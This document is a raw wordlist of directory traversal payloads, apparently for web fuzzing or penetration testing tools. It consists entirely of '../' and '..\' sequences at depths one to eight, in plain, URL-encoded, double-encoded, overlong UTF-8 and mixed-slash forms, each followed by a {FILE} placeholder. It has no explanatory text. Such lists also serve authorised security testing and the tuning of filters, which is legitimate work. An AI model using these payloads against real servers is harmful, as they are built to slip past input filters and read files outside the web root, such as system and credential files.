%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
